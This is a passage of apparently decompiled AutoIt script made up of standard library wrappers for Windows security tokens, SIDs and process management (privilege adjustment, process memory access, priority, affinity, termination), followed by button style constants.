  291. IF NOT _SECURITY__ADJUSTTOKENPRIVILEGES($HTOKEN,FALSE ,$PCURRSTATE,$ICURRSTATE,$PPREVSTATE,$PREQUIRED)THEN RETURN SETERROR(-2,@ERROR,FALSE )
  292. DLLSTRUCTSETDATA($TPREVSTATE,"Count",1)
  293. DLLSTRUCTSETDATA($TPREVSTATE,"LUID",$ILUID)
  294. LOCAL $IATTRIBUTES=DLLSTRUCTGETDATA($TPREVSTATE,"Attributes")
  295. IF $FENABLE THEN
  296. $IATTRIBUTES=BITOR($IATTRIBUTES,$SE_PRIVILEGE_ENABLED)
  297. ELSE
  298. $IATTRIBUTES=BITAND($IATTRIBUTES,BITNOT($SE_PRIVILEGE_ENABLED))
  299. ENDIF
  300. DLLSTRUCTSETDATA($TPREVSTATE,"Attributes",$IATTRIBUTES)
  301. IF NOT _SECURITY__ADJUSTTOKENPRIVILEGES($HTOKEN,FALSE ,$PPREVSTATE,$IPREVSTATE,$PCURRSTATE,$PREQUIRED)THEN RETURN SETERROR(-3,@ERROR,FALSE )
  302. RETURN TRUE
  303. ENDFUNC
  304. FUNC _SECURITY__SIDTOSTRINGSID($PSID)
  305. IF NOT _SECURITY__ISVALIDSID($PSID)THEN RETURN SETERROR(-1,0,"")
  306. LOCAL $ARESULT=DLLCALL("advapi32.dll","int","ConvertSidToStringSidW","ptr",$PSID,"ptr*",0)
  307. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  308. IF NOT $ARESULT[0]THEN RETURN ""
  309. LOCAL $TBUFFER=DLLSTRUCTCREATE("wchar Text[256]",$ARESULT[2])
  310. LOCAL $SSID=DLLSTRUCTGETDATA($TBUFFER,"Text")
  311. DLLCALL("Kernel32.dll","ptr","LocalFree","ptr",$ARESULT[2])
  312. RETURN $SSID
  313. ENDFUNC
  314. FUNC _SECURITY__SIDTYPESTR($ITYPE)
  315. SWITCH $ITYPE
  316. CASE 1
  317. RETURN "User"
  318. CASE 2
  319. RETURN "Group"
  320. CASE 3
  321. RETURN "Domain"
  322. CASE 4
  323. RETURN "Alias"
  324. CASE 5
  325. RETURN "Well Known Group"
  326. CASE 6
  327. RETURN "Deleted Account"
  328. CASE 7
  329. RETURN "Invalid"
  330. CASE 8
  331. RETURN "Invalid"
  332. CASE 9
  333. RETURN "Computer"
  334. CASE ELSE
  335. RETURN "Unknown SID Type"
  336. ENDSWITCH
  337. ENDFUNC
  338. FUNC _SECURITY__STRINGSIDTOSID($SSID)
  339. LOCAL $ARESULT=DLLCALL("advapi32.dll","bool","ConvertStringSidToSidW","wstr",$SSID,"ptr*",0)
  340. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,0)
  341. IF NOT $ARESULT[0]THEN RETURN 0
  342. LOCAL $ISIZE=_SECURITY__GETLENGTHSID($ARESULT[2])
  343. LOCAL $TBUFFER=DLLSTRUCTCREATE("byte Data["&$ISIZE&"]",$ARESULT[2])
  344. LOCAL $TSID=DLLSTRUCTCREATE("byte Data["&$ISIZE&"]")
  345. DLLSTRUCTSETDATA($TSID,"Data",DLLSTRUCTGETDATA($TBUFFER,"Data"))
  346. DLLCALL("kernel32.dll","ptr","LocalFree","ptr",$ARESULT[2])
  347. RETURN $TSID
  348. ENDFUNC
  349. GLOBAL $PROCESS_THIS_HANDLE=PTR(-1)
  350. IF STRINGREGEXP(@OSVERSION,"_(XP|200(0|3))")THEN
  351. DIM $PROCESS_QUERY_LIMITED_INFO=1024
  352. ELSE
  353. DIM $PROCESS_QUERY_LIMITED_INFO=4096
  354. ENDIF
  355. GLOBAL $_PFADEVICETODRIVEMAP,$_PFBDEVICETODRIVEMAPINIT=FALSE
  356. FUNC __PFCLOSEHANDLE(BYREF $HHANDLE)
  357. IF NOT ISPTR($HHANDLE)OR $HHANDLE=0 THEN RETURN SETERROR(1,0,FALSE )
  358. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","CloseHandle","handle",$HHANDLE)
  359. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  360. IF NOT $ARET[0]THEN RETURN SETERROR(3,@ERROR,FALSE )
  361. $HHANDLE=0
  362. RETURN TRUE
  363. ENDFUNC
  364. FUNC __PFENFORCEPID(BYREF $VPID)
  365. IF ISNUMBER($VPID)THEN RETURN TRUE
  366. $VPID=PROCESSEXISTS($VPID)
  367. IF $VPID THEN RETURN TRUE
  368. RETURN SETERROR(1,0,FALSE )
  369. ENDFUNC
  370. FUNC __PFBUILDDEVICETODRIVEXLATION()
  371. IF $_PFBDEVICETODRIVEMAPINIT THEN RETURN TRUE
  372. LOCAL $ARET,$ADRIVEARRAY=DRIVEGETDRIVE("ALL")
  373. IF @ERROR THEN RETURN SETERROR(5,@ERROR,FALSE )
  374. DIM $_PFADEVICETODRIVEMAP[$ADRIVEARRAY[0]][2]
  375. FOR $I=1 TO $ADRIVEARRAY[0]
  376. $_PFADEVICETODRIVEMAP[$I-1][0]=STRINGUPPER($ADRIVEARRAY[$I])
  377. $ARET=DLLCALL($_COMMON_KERNEL32DLL,"dword","QueryDosDeviceW","wstr",$_PFADEVICETODRIVEMAP[$I-1][0],"wstr",0,"dword",65536)
  378. IF @ERROR THEN
  379. $_PFADEVICETODRIVEMAP=0
  380. RETURN SETERROR(2,@ERROR,FALSE )
  381. ENDIF
  382. $_PFADEVICETODRIVEMAP[$I-1][1]=$ARET[2]
  383. NEXT
  384. $_PFBDEVICETODRIVEMAPINIT=TRUE
  385. RETURN TRUE
  386. ENDFUNC
  387. FUNC __PFXLATEDEVICEPATHNAME(CONST BYREF $SIMAGEFILENAME,$BRESETDRIVEMAP)
  388. IF NOT ISSTRING($SIMAGEFILENAME)OR $SIMAGEFILENAME="" THEN RETURN SETERROR(1,0,"")
  389. IF $BRESETDRIVEMAP THEN $_PFBDEVICETODRIVEMAPINIT=FALSE
  390. IF NOT (__PFBUILDDEVICETODRIVEXLATION())THEN RETURN SETERROR(@ERROR,0,"")
  391. FOR $I2=1 TO 2
  392. FOR $I=0 TO UBOUND($_PFADEVICETODRIVEMAP)-1
  393. IF STRINGINSTR($SIMAGEFILENAME,$_PFADEVICETODRIVEMAP[$I][1])=1 THEN RETURN STRINGREPLACE($SIMAGEFILENAME,$_PFADEVICETODRIVEMAP[$I][1],$_PFADEVICETODRIVEMAP[$I][0])
  394. NEXT
  395. IF $BRESETDRIVEMAP THEN RETURN SETERROR(1,0,"")
  396. $_PFBDEVICETODRIVEMAPINIT=FALSE
  397. IF NOT (__PFBUILDDEVICETODRIVEXLATION())THEN RETURN SETERROR(@ERROR,0,"")
  398. $BRESETDRIVEMAP=TRUE
  399. NEXT
  400. RETURN SETERROR(1,0,"")
  401. ENDFUNC
  402. FUNC _PROCESSOPEN($VPROCESSID,$IACCESS,$BINHERITHANDLE=FALSE )
  403. IF NOT ISNUMBER($IACCESS)OR NOT ISBOOL($BINHERITHANDLE)THEN RETURN SETERROR(1,0,0)
  404. LOCAL $ARET
  405. IF $VPROCESSID=-1 THEN
  406. $ARET=DLLCALL($_COMMON_KERNEL32DLL,"handle","GetCurrentProcess")
  407. IF @ERROR THEN RETURN SETERROR(2,@ERROR,0)
  408. RETURN $ARET[0]
  409. ELSEIF NOT __PFENFORCEPID($VPROCESSID)THEN
  410. RETURN SETERROR(16,0,0)
  411. ENDIF
  412. $ARET=DLLCALL($_COMMON_KERNEL32DLL,"handle","OpenProcess","dword",$IACCESS,"bool",$BINHERITHANDLE,"dword",$VPROCESSID)
  413. IF @ERROR THEN RETURN SETERROR(2,@ERROR,0)
  414. IF NOT $ARET[0]THEN RETURN SETERROR(3,@ERROR,0)
  415. RETURN SETEXTENDED($VPROCESSID,$ARET[0])
  416. ENDFUNC
  417. FUNC _PROCESSCLOSEHANDLE(BYREF $HPROCESS)
  418. IF NOT __PFCLOSEHANDLE($HPROCESS)THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  419. RETURN TRUE
  420. ENDFUNC
  421. FUNC _PROCESSGETPID($HPROCESS)
  422. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,0)
  423. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"dword","GetProcessId","handle",$HPROCESS)
  424. IF @ERROR THEN RETURN SETERROR(2,@ERROR,0)
  425. IF $ARET[0]=0 THEN SETERROR(3)
  426. RETURN $ARET[0]
  427. ENDFUNC
  428. FUNC _PROCESSGETEXITCODE($HPROCESS)
  429. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  430. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","GetExitCodeProcess","handle",$HPROCESS,"int*",0)
  431. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  432. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,-1)
  433. RETURN $ARET[2]
  434. ENDFUNC
  435. FUNC _PROCESSISWOW64($HPROCESS)
  436. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,FALSE )
  437. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","IsWow64Process","handle",$HPROCESS,"bool*",0)
  438. IF @ERROR THEN
  439. IF @ERROR=3 THEN RETURN FALSE
  440. RETURN SETERROR(2,@ERROR,FALSE )
  441. ENDIF
  442. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  443. RETURN $ARET[2]
  444. ENDFUNC
  445. FUNC _PROCESSIS32BIT($HPROCESS)
  446. IF @OSARCH<>"X64" AND @OSARCH<>"IA64" THEN
  447. IF NOT ISPTR($HPROCESS)THEN SETERROR(1,0)
  448. RETURN TRUE
  449. ENDIF
  450. IF _PROCESSISWOW64($HPROCESS)THEN RETURN TRUE
  451. RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  452. ENDFUNC
  453. FUNC _PROCESSIS64BIT($HPROCESS)
  454. IF @OSARCH="X64" OR @OSARCH="IA64" THEN
  455. IF _PROCESSISWOW64($HPROCESS)THEN RETURN FALSE
  456. RETURN SETERROR(@ERROR,@EXTENDED,TRUE )
  457. ENDIF
  458. IF NOT ISPTR($HPROCESS)THEN SETERROR(1,0)
  459. RETURN FALSE
  460. ENDFUNC
  461. FUNC _PROCESSGETPRIORITYX($HPROCESS)
  462. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  463. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"int","GetPriorityClass","handle",$HPROCESS)
  464. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  465. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,-1)
  466. RETURN $ARET[0]
  467. ENDFUNC
  468. FUNC _PROCESSSETPRIORITYX($HPROCESS,$IPRIORITY=32)
  469. IF NOT ISPTR($HPROCESS)OR NOT ISNUMBER($IPRIORITY)THEN RETURN SETERROR(1,0,FALSE )
  470. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","SetPriorityClass","handle",$HPROCESS,"int",$IPRIORITY)
  471. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  472. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  473. RETURN TRUE
  474. ENDFUNC
  475. FUNC _PROCESSGETAFFINITYMASK($HPROCESS)
  476. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,0)
  477. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","GetProcessAffinityMask","handle",$HPROCESS,"dword_ptr*",0,"dword_ptr*",0)
  478. IF @ERROR THEN RETURN SETERROR(2,@ERROR,0)
  479. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,0)
  480. RETURN SETEXTENDED($ARET[3],$ARET[2])
  481. ENDFUNC
  482. FUNC _PROCESSSETAFFINITYMASK($HPROCESS,$IAFFINITYMASK)
  483. IF NOT ISPTR($HPROCESS)OR NOT ISNUMBER($IAFFINITYMASK)THEN RETURN SETERROR(1,0,FALSE )
  484. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","SetProcessAffinityMask","handle",$HPROCESS,"dword_ptr",$IAFFINITYMASK)
  485. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  486. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  487. RETURN TRUE
  488. ENDFUNC
  489. FUNC _PROCESSGETTIMES($HPROCESS,$ITIMETOGET=-1)
  490. IF NOT ISPTR($HPROCESS)OR $ITIMETOGET>3 THEN RETURN SETERROR(1,0,-1)
  491. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","GetProcessTimes","handle",$HPROCESS,"uint64*",0,"uint64*",0,"uint64*",0,"uint64*",0)
  492. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  493. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,-1)
  494. IF $ITIMETOGET<0 THEN
  495. DIM $ATIMES[4]=[$ARET[2],$ARET[3],$ARET[4],$ARET[5]]
  496. RETURN $ATIMES
  497. ENDIF
  498. RETURN $ARET[$ITIMETOGET+2]
  499. ENDFUNC
  500. FUNC _PROCESSGETSESSIONID($VPROCESSID)
  501. IF NOT __PFENFORCEPID($VPROCESSID)THEN RETURN SETERROR(1,0,-1)
  502. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","ProcessIdToSessionId","dword",$VPROCESSID,"dword*",0)
  503. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  504. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,-1)
  505. RETURN $ARET[2]
  506. ENDFUNC
  507. FUNC _PROCESSGETOWNER($HPROCESS,$VADVAPI32DLL="advapi32.dll")
  508. IF NOT ISPTR($HPROCESS)OR $VADVAPI32DLL<0 THEN RETURN SETERROR(1,0,"")
  509. LOCAL $AOWNERSECINFO,$AGROUPSECINFO,$SOWNER=""
  510. LOCAL $ARET=DLLCALL($VADVAPI32DLL,"dword","GetSecurityInfo","handle",$HPROCESS,"int",6,"dword",3,"ptr*",0,"ptr*",0,"ptr*",0,"ptr*",0,"ptr*",0)
  511. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  512. IF $ARET[0]THEN RETURN SETERROR(3,$ARET[0],"")
  513. $AOWNERSECINFO=_SECURITY__LOOKUPACCOUNTSID($ARET[4])
  514. IF ISARRAY($AOWNERSECINFO)AND $AOWNERSECINFO[1]<>"BUILTIN" THEN
  515. $SOWNER=$AOWNERSECINFO[0]
  516. ELSE
  517. $AGROUPSECINFO=_SECURITY__LOOKUPACCOUNTSID($ARET[5])
  518. IF ISARRAY($AGROUPSECINFO)THEN $SOWNER=$AGROUPSECINFO[0]
  519. IF $SOWNER="None" THEN $SOWNER=@USERNAME
  520. ENDIF
  521. $ARET=DLLCALL($_COMMON_KERNEL32DLL,"handle","LocalFree","handle",$ARET[8])
  522. IF @ERROR THEN
  523. SETERROR(-2,@ERROR)
  524. ELSEIF $ARET[0]THEN
  525. SETERROR(-3,$ARET[0])
  526. ENDIF
  527. RETURN $SOWNER
  528. ENDFUNC
  529. FUNC _PROCESSGETHANDLECOUNT($HPROCESS)
  530. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,-1)
  531. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","GetProcessHandleCount","handle",$HPROCESS,"dword*",0)
  532. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  533. IF NOT $ARET[0]THEN RETURN SETERROR(3,@ERROR,-1)
  534. RETURN $ARET[2]
  535. ENDFUNC
  536. FUNC _PROCESSGETIOCOUNTERS($HPROCESS,$ICOUNTERTOGET=-1)
  537. IF NOT ISPTR($HPROCESS)OR $ICOUNTERTOGET>5 THEN RETURN SETERROR(1,0,-1)
  538. LOCAL $STIOCOUNTERS=DLLSTRUCTCREATE("uint64;uint64;uint64;uint64;uint64;uint64")
  539. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","GetProcessIoCounters","handle",$HPROCESS,"ptr",DLLSTRUCTGETPTR($STIOCOUNTERS))
  540. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  541. IF NOT $ARET[0]THEN RETURN SETERROR(3,@ERROR,-1)
  542. IF $ICOUNTERTOGET<0 THEN
  543. DIM $ACOUNTERINFO[6]
  544. FOR $I=0 TO 5
  545. $ACOUNTERINFO[$I]=DLLSTRUCTGETDATA($STIOCOUNTERS,$I+1)
  546. NEXT
  547. RETURN $ACOUNTERINFO
  548. ENDIF
  549. RETURN DLLSTRUCTGETDATA($STIOCOUNTERS,$ICOUNTERTOGET+1)
  550. ENDFUNC
  551. FUNC _PROCESSGETGUIRESOURCES($HPROCESS,$IOBJTYPE)
  552. IF NOT ISPTR($HPROCESS)OR $IOBJTYPE<0 OR $IOBJTYPE>4 THEN RETURN SETERROR(1,0,-1)
  553. LOCAL $ARET=DLLCALL($_COMMON_USER32DLL,"dword","GetGuiResources","handle",$HPROCESS,"dword",$IOBJTYPE)
  554. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  555. RETURN $ARET[0]
  556. ENDFUNC
  557. FUNC _PROCESSGETFILENAME($HPROCESS,$VPSAPIDLL=-1)
  558. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,"")
  559. IF NOT ISSTRING($VPSAPIDLL)AND $VPSAPIDLL<0 THEN $VPSAPIDLL=@SYSTEMDIR&"\psapi.dll"
  560. IF @OSVERSION="WIN_2000" THEN
  561. LOCAL $ARET=DLLCALL($VPSAPIDLL,"dword","GetModuleBaseNameW","handle",$HPROCESS,"handle",0,"wstr",0,"dword",65536)
  562. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  563. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,"")
  564. RETURN $ARET[3]
  565. ENDIF
  566. LOCAL $ARET=DLLCALL($VPSAPIDLL,"dword","GetProcessImageFileNameW","handle",$HPROCESS,"wstr","","dword",65536)
  567. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  568. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,"")
  569. RETURN STRINGMID($ARET[2],STRINGINSTR($ARET[2],"\",1,-1)+1)
  570. ENDFUNC
  571. FUNC _PROCESSGETFILENAMEBYPID($VPROCESSID)
  572. IF NOT __PFENFORCEPID($VPROCESSID)THEN RETURN SETERROR(1,0,"")
  573. LOCAL $APROCLIST=PROCESSLIST()
  574. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  575. FOR $I=1 TO $APROCLIST[0][0]
  576. IF $VPROCESSID=$APROCLIST[$I][1]THEN RETURN $APROCLIST[$I][0]
  577. NEXT
  578. RETURN SETERROR(4,0,"")
  579. ENDFUNC
  580. FUNC _PROCESSGETPATHNAME($HPROCESS,$BRESETDRIVEMAP=FALSE ,$VPSAPIDLL=-1)
  581. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,"")
  582. IF NOT ISSTRING($VPSAPIDLL)AND $VPSAPIDLL<0 THEN $VPSAPIDLL=@SYSTEMDIR&"\psapi.dll"
  583. LOCAL $ARET
  584. IF @OSVERSION<>"WIN_XP" AND @OSVERSION<>"WIN_XPe" AND @OSVERSION<>"WIN_2003" THEN
  585. IF @OSVERSION="WIN_2000" THEN
  586. $ARET=DLLCALL($VPSAPIDLL,"dword","GetModuleFileNameExW","handle",$HPROCESS,"handle",0,"wstr","","dword",65536)
  587. ELSE
  588. $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","QueryFullProcessImageNameW","handle",$HPROCESS,"dword",0,"wstr","","dword*",65536)
  589. ENDIF
  590. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  591. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,"")
  592. RETURN $ARET[3]
  593. ENDIF
  594. $ARET=DLLCALL($VPSAPIDLL,"dword","GetProcessImageFileNameW","handle",$HPROCESS,"wstr","","dword",65536)
  595. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  596. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,"")
  597. $ARET=__PFXLATEDEVICEPATHNAME($ARET[2],$BRESETDRIVEMAP)
  598. SETERROR(@ERROR,@EXTENDED)
  599. RETURN $ARET
  600. ENDFUNC
  601. FUNC _PROCESSWAITFORINPUTIDLE($HPROCESS,$ITIMEOUT)
  602. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,FALSE )
  603. LOCAL $ARET=DLLCALL($_COMMON_USER32DLL,"int","WaitForInputIdle","handle",$HPROCESS,"dword",$ITIMEOUT)
  604. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  605. IF $ARET[0]THEN RETURN SETERROR(3,$ARET[0],FALSE )
  606. RETURN TRUE
  607. ENDFUNC
  608. FUNC _PROCESSGETMEMINFO($HPROCESS,$IINFOTOGET=-1,$VPSAPIDLL=-1)
  609. IF NOT ISPTR($HPROCESS)OR $IINFOTOGET>8 THEN RETURN SETERROR(1,0,-1)
  610. LOCAL $STMEMCOUNTERS=DLLSTRUCTCREATE("dword;dword;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr")
  611. IF NOT ISSTRING($VPSAPIDLL)AND $VPSAPIDLL<0 THEN $VPSAPIDLL=@SYSTEMDIR&"\psapi.dll"
  612. LOCAL $ARET=DLLCALL($VPSAPIDLL,"bool","GetProcessMemoryInfo","handle",$HPROCESS,"ptr",DLLSTRUCTGETPTR($STMEMCOUNTERS),"dword",DLLSTRUCTGETSIZE($STMEMCOUNTERS))
  613. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  614. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,-1)
  615. IF $IINFOTOGET<0 THEN
  616. DIM $AMEMINFO[9]
  617. FOR $I=0 TO 8
  618. $AMEMINFO[$I]=DLLSTRUCTGETDATA($STMEMCOUNTERS,$I+2)
  619. NEXT
  620. RETURN $AMEMINFO
  621. ENDIF
  622. RETURN DLLSTRUCTGETDATA($STMEMCOUNTERS,$IINFOTOGET+2)
  623. ENDFUNC
  624. FUNC _PROCESSEMPTYWORKINGSET($HPROCESS,$VPSAPIDLL=-1)
  625. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,FALSE )
  626. IF NOT ISSTRING($VPSAPIDLL)AND $VPSAPIDLL<0 THEN $VPSAPIDLL=@SYSTEMDIR&"\psapi.dll"
  627. LOCAL $ARET=DLLCALL($VPSAPIDLL,"bool","EmptyWorkingSet","handle",$HPROCESS)
  628. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  629. RETURN $ARET[0]
  630. ENDFUNC
  631. FUNC _PROCESSMEMORYREAD($HPROCESS,$PSOURCE,$PDEST,$INUMBYTES)
  632. IF NOT ISPTR($HPROCESS)OR NOT ISPTR($PSOURCE)OR NOT ISPTR($PDEST)OR NOT ISNUMBER($INUMBYTES)OR $INUMBYTES<=0 THEN RETURN SETERROR(1,0,FALSE )
  633. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","ReadProcessMemory","handle",$HPROCESS,"ptr",$PSOURCE,"ptr",$PDEST,"ulong_ptr",$INUMBYTES,"ulong_ptr*",0)
  634. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  635. IF NOT $ARET[0]THEN RETURN SETERROR(3,$ARET[5],FALSE )
  636. RETURN SETEXTENDED($ARET[5],TRUE )
  637. ENDFUNC
  638. FUNC _PROCESSMEMORYWRITE($HPROCESS,$PDEST,$PSOURCE,$INUMBYTES)
  639. IF NOT ISPTR($HPROCESS)OR NOT ISPTR($PSOURCE)OR NOT ISPTR($PDEST)OR NOT ISNUMBER($INUMBYTES)OR $INUMBYTES<=0 THEN RETURN SETERROR(1,0,FALSE )
  640. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","WriteProcessMemory","handle",$HPROCESS,"ptr",$PDEST,"ptr",$PSOURCE,"ulong_ptr",$INUMBYTES,"ulong_ptr*",0)
  641. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  642. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  643. RETURN SETEXTENDED($ARET[5],TRUE )
  644. ENDFUNC
  645. FUNC _PROCESSMEMORYALLOC($HPROCESS,$INUMBYTES,$IALLOCTYPE,$IPROTECTTYPE,$PADDRESS=0)
  646. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,0)
  647. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"ptr","VirtualAllocEx","handle",$HPROCESS,"ptr",$PADDRESS,"ulong_ptr",$INUMBYTES,"dword",$IALLOCTYPE,"dword",$IPROTECTTYPE)
  648. IF @ERROR THEN RETURN SETERROR(2,@ERROR,0)
  649. IF $ARET[0]=0 THEN RETURN SETERROR(3,0,0)
  650. RETURN $ARET[0]
  651. ENDFUNC
  652. FUNC _PROCESSMEMORYFREE($HPROCESS,BYREF $PADDRESS,$INUMBYTES=0,$IFREETYPE=32768)
  653. IF NOT ISPTR($HPROCESS)OR NOT ISPTR($PADDRESS)THEN RETURN SETERROR(1,0,FALSE )
  654. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","VirtualFreeEx","handle",$HPROCESS,"ptr",$PADDRESS,"ulong_ptr",$INUMBYTES,"dword",$IFREETYPE)
  655. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  656. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  657. IF $IFREETYPE=32768 THEN $PADDRESS=0
  658. RETURN TRUE
  659. ENDFUNC
  660. FUNC _PROCESSMEMORYVIRTUALQUERY($HPROCESS,$PADDRESS,$IINFO=-1)
  661. IF NOT ISPTR($HPROCESS)OR NOT ISPTR($PADDRESS)OR $IINFO>6 THEN RETURN SETERROR(1,0,-1)
  662. LOCAL $ARET,$STMEMINFO=DLLSTRUCTCREATE("ptr;ptr;dword;ulong_ptr;dword;dword;dword"),$ISTRSZ=DLLSTRUCTGETSIZE($STMEMINFO)
  663. $ARET=DLLCALL($_COMMON_KERNEL32DLL,"ulong_ptr","VirtualQueryEx","handle",$HPROCESS,"ptr",$PADDRESS,"ptr",DLLSTRUCTGETPTR($STMEMINFO),"ulong_ptr",$ISTRSZ)
  664. IF @ERROR THEN RETURN SETERROR(2,@ERROR,-1)
  665. IF NOT $ARET[0]THEN RETURN SETERROR(3,@ERROR,-1)
  666. IF $ARET[0]<>$ISTRSZ THEN CONSOLEWRITEERROR("Size (in bytes) mismatch in VirtualQueryEx: Struct: "&$ISTRSZ&", Transferred: "&$ARET[0]&@LF)
  667. IF $IINFO<0 THEN
  668. DIM $AMEMINFO[7]
  669. FOR $I=0 TO 6
  670. $AMEMINFO[$I]=DLLSTRUCTGETDATA($STMEMINFO,$I+1)
  671. NEXT
  672. RETURN $AMEMINFO
  673. ENDIF
  674. RETURN DLLSTRUCTGETDATA($STMEMINFO,$IINFO+1)
  675. ENDFUNC
  676. FUNC _PROCESSMEMORYVIRTUALPROTECT($HPROCESS,$PADDRESS,$INUMBYTES,$IPROTECT)
  677. IF NOT ISPTR($HPROCESS)OR NOT ISPTR($PADDRESS)OR $INUMBYTES<=0 THEN RETURN SETERROR(1,0,FALSE )
  678. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","VirtualProtectEx","handle",$HPROCESS,"ptr",$PADDRESS,"ulong_ptr",$INUMBYTES,"dword",$IPROTECT,"dword*",0)
  679. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  680. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  681. RETURN SETERROR(0,$ARET[5],TRUE )
  682. ENDFUNC
  683. FUNC _PROCESSTERMINATE($HPROCESS,$IEXITCODE=0)
  684. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,FALSE )
  685. LOCAL $ARET=DLLCALL($_COMMON_KERNEL32DLL,"bool","TerminateProcess","handle",$HPROCESS,"int",$IEXITCODE)
  686. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  687. IF NOT $ARET[0]THEN RETURN SETERROR(3,0,FALSE )
  688. RETURN TRUE
  689. ENDFUNC
  690. GLOBAL CONST $BS_GROUPBOX=7
  691. GLOBAL CONST $BS_BOTTOM=2048
  692. GLOBAL CONST $BS_CENTER=768
  693. GLOBAL CONST $BS_DEFPUSHBUTTON=1
  694. GLOBAL CONST $BS_LEFT=256
  695. GLOBAL CONST $BS_MULTILINE=8192
  696. GLOBAL CONST $BS_PUSHBOX=10
  697. GLOBAL CONST $BS_PUSHLIKE=4096
  698. GLOBAL CONST $BS_RIGHT=512
  699. GLOBAL CONST $BS_RIGHTBUTTON=32
  700. GLOBAL CONST $BS_TOP=1024
  701. GLOBAL CONST $BS_VCENTER=3072
  702. GLOBAL CONST $BS_FLAT=32768
  703. GLOBAL CONST $BS_ICON=64
  704. GLOBAL CONST $BS_BITMAP=128
  705. GLOBAL CONST $BS_NOTIFY=16384
  706. GLOBAL CONST $BS_SPLITBUTTON=12
  707. GLOBAL CONST $BS_DEFSPLITBUTTON=13
  708. GLOBAL CONST $BS_COMMANDLINK=14
  709. GLOBAL CONST $BS_DEFCOMMANDLINK=15
  710. GLOBAL CONST $BCSIF_GLYPH=1
  711. GLOBAL CONST $BCSIF_IMAGE=2
  712. GLOBAL CONST $BCSIF_STYLE=4
  713. GLOBAL CONST $BCSIF_SIZE=8
  714. GLOBAL CONST $BCSS_NOSPLIT=1
  715. GLOBAL CONST $BCSS_STRETCH=2
  716. GLOBAL CONST $BCSS_ALIGNLEFT=4
  717. GLOBAL CONST $BCSS_IMAGE=8
